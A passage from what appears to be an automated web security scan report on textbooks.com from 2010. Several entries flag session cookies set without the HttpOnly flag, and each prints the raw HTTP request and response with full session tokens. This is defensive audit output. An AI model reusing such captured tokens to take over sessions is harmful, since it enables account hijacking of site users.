TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GiHxY1D3cco5MVEkJIPPzVJuChM3fY39LY0RqwQktwWvsjTa0JW2BsknacfepGmlFDIZbbqDxckkx7cS%2B2gpBVd81euP6li0UkLy4rhaA%2Bodl97BdkV%2FNWgvhpwdKClEa6%2BAtfXODXEjew%2B9zK8CWS0yYQk57HF%2FnqvaSCctClM%2BIvvJZqIx%2FeNhi2pB7ep4zZ2njrU6BryD7vlbHDKSWd0bp4zA9mC8VfRHw0tVL3BBHcm2uY9Sevw5VFDyiGx1OEqQrxHi6tAC4D1DuZrcv4DzoyNLtKQWJuWID%2F5qJhubasF%2Bm28PpefqDT5cYODfBNRkKZmIa%2FUFQ%2FX2Qbr8CP0VhjYF12bO%2BxxTRKvAcqkXYmALAwnnee4IcJUVSicNatp1mwue8oTX1n7YFTQB10OyP3whu4fkDusZhf9pCKxG9JYbsFbb3dIFtzrtS74XTNXHE%2BomeT%2FLpL4ivx2QD02pSPCb%2BWPNQAe23fmkcONLpzuY6Omfgsdh3paEJb6jYOVvb9mjERi6Df9TXSE1OT98M2ca%2F0KExDmuLmLdIfNWK7vm%2FG2uznIQv8oNMt3K4uJ0j%2BMxdyKq0lkgnm3300m7McnZyQV%2BwpM%2BOCXdpyrkzniMBkmcs%2BjGbxYVr%2FSqNHtICgvpQIiu6ijTVrgTyT2fL2W0kliEQ0dHSxptuAICRwjSSUwbngIp3YgysuskgApfkMVgGvmOvFrDXf6bZ56tc01ItN%2BSIl8BuFqDlUeo5dtF2e8GUy3g5%2BNGkwId%2B%2BgUojbARJE2QQDDy1zdhAEjPbyXyMHTLA%2FJ6CU1crFQtGgYSbHQJDEArhhh1OLIsN9HSIOM9YX4IpDgE8zq0Vx2SdjrD74pL%2FxsdepKhsGQH6vOGMcv8JAEoHcNg1qtYDsU%2BRDQf7MmtzllrDVWi8FyM7nL63JML1PYKJu0RgPh935Po%2B1rYA%2BOCQgs8WMMhIODH77ncgKZ1v8MHkCe3SOzwSoWTaYOwcukdGlwbQE2Di9t1zECsrDQHQEScSodmEpNcDKuJroACTyFrDWhR4AV1Qtcli8UoAmW0T0wrX7O9%2FcsTGZFbaYdfw%2FWPpdq6zCXpj9%2FFdLOQroa6wGM88lqtvUZfEQU3XiZcChM7vky1TwVEf6XoBbuAtAiNO4JVrBOynByFkyFhRWgQTVGuzS323Qbx8nx8rqbA6zSxvUd%2FNUrxyBGaWeRe5N6OzorGK96RwA9bGF57MwpWxOX15ngqzMBLXcGiwGBlVkUjo%2FjUYwl0eyDR9%2B22xI%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=f39%2Fcfnu9ABQ2dwwkCM%3D; expires=Mon, 26-Dec-2011 13:52:15 GMT; path=/; domain=.textbooks.com
Content-Length: 146725


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.15. http://www.textbooks.com/Catalog/L/Languages-and-Literature.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/L/Languages-and-Literature.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/L/Languages-and-Literature.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=fG72Ywc0mypIeiUOVirDicOhdEiMF9lcHZcxvnN9IfzPHM7%2Fdj6%2Bxzm2f0ExlpWk4NOHPwyiv2FQjPkEPftsUH444oS5QEj%2F7FcoUz%2F2UiarYADCZBV7bvB3t5em%2FkVyJAd13MqPgRmdN2unHuNkWq9c%2F9dHAypavFCO6mEdofd1xL1RzdrXOI7y54sKeTyeqsSLcpiM0yw3lM%2Fl7pIsuPDE51V882MXAvAFaGcuq4oSE1p54pfpDlab5dOH%2F4NwnOo%2FoPR9mR4uKgizRaHMEfKeq8uePaO18QCdSAVHwGHiEHGPifga%2FilOSfknVYckULN12xqKaHN9wmROhId29IVAbZVf%2FWs9FTdrgnTc0sIVJH1b%2FyGV6M%2Fx7aJSPtZmpBbe9vKoCIk03t8P6P5H6z89b90540ITX%2BDzPg7nPblJrmhTlDQLUmFTM%2BqIVOs37TM2UIqGD24KmfexRXtcqEYwVdJ21gHCCRYTS9WyfWfzjON%2FQ0KAoZeMJsMlq0UsCFnJpmJqvGFORGTo1rnW2zOukOBvEllteDcqTU1q%2F%2F962rv93ZZ5vqDyhd%2FCUiCPa59XC%2Bn1JaiuiwlaZTZb%2B%2BArlq%2FwRRJgGrBzun%2BnCmsdVfGKn%2FWbd3pRcSA26F%2F39rjk0iSmvFHv8wa2FfpqH7nrqzrliOwI6qBbrkxrmFOoMnw1dZqVWZ4bb2Kfdxiy17Xo54RGASv10NyRfy%2BxNlpdpE4gPFJ2D0oJiUJgw96ju5zbbWWJg%2BAvVuMOQtxANnyUh8UlAxmfQnFx07C5io5AUYQLOI%2BoVD9dlQ8iEPMFE3KsPPH6madVkp5cTgPNWZXrbsoREQE88WSqo84sVQdSCp4IGUUuYx5Tamm8K5NYWfp4u1Xl1%2FCA1AiZqK%2BuWauYeTfEYgpjvbRaOTe41ZI31yjXfm9COC9PrMxQ9ErUmiZTBatdCSjZm6ppWKahFzB4eRopdj8pMlfqYQEH1iIsh3x1nHkCohb9Uh%2FD4m44o%2F13bg%2FyvaW9bPkF1IWVpPHxfkRlWqleiApjRZKmq6d53e28A4aMRtQ3NA8n%2F35Bu2jPSNcVbltPAFqXUMxQxeBcLO7Tk4wzYbu3Vn5JTsBORC2Qgk7G4a4bACsuyrCcH3zK089TfsN6WRQL7W3HTmNTgvaVDOTNRLDM9EvnASzyZ%2Btl9bPGmSxspfpY%2B%2BKX42HaojTJAQpfsRM4F5PpT0TfOkPuEO9ngIzhsYMyogEE%2FZUZp1ZCkzpFSr8sj74FUoPB3ZkZ9wgxwPM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=WoYEsU7gFTAI7ua5Jys%3D; expires=Mon, 26-Dec-2011 13:52:14 GMT; path=/; domain=.textbooks.com
Content-Length: 117783


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.16. http://www.textbooks.com/Catalog/M/Math-and-Science.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/M/Math-and-Science.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/M/Math-and-Science.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:14 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=sRYyuJOpJ49sOCeckknOc8%2Fcs7RloEdBrMTr%2BX3T%2Bk%2Fv5pt27NdGyXLZyzHucDE8rXw4%2BfXsIr%2BCpN%2FCtHnuYa3NhYsfMh1QILSzU0MQIwQSWjzH5ToSGVnucX%2FtpdrAFMOj40dnQIioGkv0lpLlh2CtLgep8EcFQkfDXd37cLPs%2F5o4moXMvG1hY%2FbOER3D8irgpVWkuKtwTW0gZlJICUzR7Oim3d7liJhxzJRh58EQ8TeQF49kQik%2B2Pbf%2F6iOUswk13E3R98PHRxmemNdFbEzMQY7sP6LnVqvP20o3LEBQJ909k2KRX5f0sWvYiQ4KUC6qfPO99mDNegJMJWUKpPxiHIhJMTIROOzS6bsKoXb%2BvPsP%2FP03aFufgrd9rpQ98wYCRLSKVp7jJHiJKkZum3qkL03Q8x5xMjayRIZYSFjKoFzRnUPA9sws2plGK0DGgcF0hozx64Ui7XNou1VK7rjpta3BzKYl%2FZ3rWS0xgA9ui8uEG9w%2F%2FS1iwAQFXhbClubDGgBSWowXccDFQ6DLQJrPF6B2%2BqP2JO%2BSwAridOtOG5%2F2%2BxIu%2Frn46TQJ6rSxOPo0APQEJDeF9TjV0%2Fi6APMF%2F3NxURl%2Bkec6xnuRS%2BE%2BHEkwzDXMWkB%2FEl%2FgzpR1LDtO%2F5ngIlCKnsVkA0dvevJ9c5zYJuqsIBqxqa1XgiWjtXPKZ3ZjDSuiD0llOGuAuphsEA1Yud9z80eI3Q9ZOpWewU2MCt0ZZr%2Bsx%2Flr2atJm%2FxXiCajcLKoUvr%2B9cZn%2BF8TxjgxpW6IKoDYHZgvnKORQGFMkhNDX3gvCyMx50hbSffl8DAsRJ%2Bf4a%2BJLjp7AM8ZspOEc49d4eQTnb6JfEaWVHdBb46O1cs9zuiML%2FK1a4i9ejOJ0qnkaYq8G2xDWH8OATLTwnJVfLGfQSCPmeq8N%2FPLFNHozymdd%2FHoE0WPkEKlHtqjdmul2aFkV9xnXsnVgFGvVA7b4D5urcsmpRWX6ICBAYhWCl2IUfMwwFkgRlEu9fkC7Ei5P6ZVAuzjxTlz5gCui5CrEHqqRXT3b4NdXcpJRhQ9EagWvIhwfj4YnUzAuKByVFMouxFQ3D5np%2F2qYDux1fTn3nDdYxKKtzdYucTC5rC4W7NorEgxxk9oe5HyJ8TaWzd%2FAFnPtmL496iB%2BX%2BQnOVeu0viFPg8vSqeB1WbskKzuPDZ%2F5bS7WGLtt3dXY1FF5UtHoAl5rPM8e%2FDm%2FGbFP2LhOgr%2FZNbbfNBaPjEjC8ZgxgtIRAENMKOVS0CmSPihhzINs%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=RtMIGQwLOLtYgRObJxw%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 131056


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.17. http://www.textbooks.com/Catalog/P/Medicine.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/P/Medicine.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/P/Medicine.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:35 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=CdH9LFYD8Vfry2EqmBGV%2B1LHC2Md9X2lIMPio%2FZHBDjj4lVYpYgFIgBJ2fDWTkgw9xwkv7JTa3ODRzvHY5dDJ187ZpfbF2xzOcgnuFAkv6DjdOCYMBmRszo%2Bt3tHlCCgViu%2FVMvYjSfG5bArg%2BaI7JjQroKb4QrzZHjip%2FKl7yEj%2FlCOWSL3e8A3nj4v1x7I4E5wRb7OKIqQmRWFocfauhZg6DBqOHAqfSXI6iVzS%2FvAm7%2FozZa2KLjjKqrhvw0JtsOpvSwUWDDrNfrSe8dZZWgDFYm0rlXdG8AXSKsFKKYE66tVpC8kgBXpRqIFjjMIirpNo%2F68Lhjtk5AxY1yIDT%2BOCOpryeVSfwXDLbJs5waIwRrOxK1VH7ISOVueu%2BbpS1gJw5bYRsAWLJIoQgjgYkNWc5wBxC7ykmjMyhtdgG35qEGcVeQTB01Q9nLqyjJyP83oPXAeGgupg0K7BIa7omAQPLXmG1OCeCYhxU5Uo8VgAaNNVjqNcA5RhO5xq5O%2FTl7vKdNE4zNaC5%2FN8fVAmfHjCjyKMvkFGW3sRHJ40p4AfJxSZGaXn92bx2VgohnBZfsUn0lSJ%2FDVp6nYl608o6In5ET35pQZFXiPKm%2F1ZvVHOilc%2B7ORIa0oZjLjqI3sBUiQ%2FbWqZj83T527z%2Fl3OcnyHIrm3k2sJ7G%2FpAoUurp6oUCFlofRkxk8ytG61j6%2BduJJrOURZcTpBLK9XPVgU5yTnkwSKBO%2BnwfvOS2XKzs6T1kPMUfZmAu%2B65HJ2QI8w91XdFq7ERP2wjH38FionnVC0M%2FuteGwFVv0nTjbFkLy3zabxNsPrqcsYB9lJGTcq2WZJOvxCve7uuPaz1RIveOtFQmAzvpHeHGJcZZO47MDIEZu4o57uEieUQVpKettpmGInz8G0LLzO%2BM%2B8QJyL3zCVcDNIQVpOv0w0LTlwd7NzCbABOGch%2BIW2IReJaYpiZoOIj%2FBSQRZvsrjShwWVO4GPGeQg5VCAeW0mVBSzgkLXXYgorH3gmvaymsuyhKQq6sPRpZ7%2FzPt9cIREY66cvfSZNH6BnUXyEIVD9p12u%2Fgz4DyUbMizmrv6D8LUH2v%2Fty%2FkZ1UT8BwxQGlXF53%2FVZrNbyDdEZpQU%2F%2BcoHql3jDCWLWEKwFn%2BE%2FPtr%2Fj3oEpsZj1IQkiEJ5PPDJM67zojrJI4kadTQEGZCfYYolV8MRO5s4C7o7fZAPmNw039hH9PNVR2wuy%2Bw0HeOfUshbA%2B49mILqIPxYgyPb1TlsjpKk9kOZlqpLBP3vwGM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=OfgoPtZ5xO56sECzXho%3D; expires=Mon, 26-Dec-2011 13:52:34 GMT; path=/; domain=.textbooks.com
Content-Length: 110012


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.18. http://www.textbooks.com/Catalog/R/Reference-Materials.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/R/Reference-Materials.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/R/Reference-Materials.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3G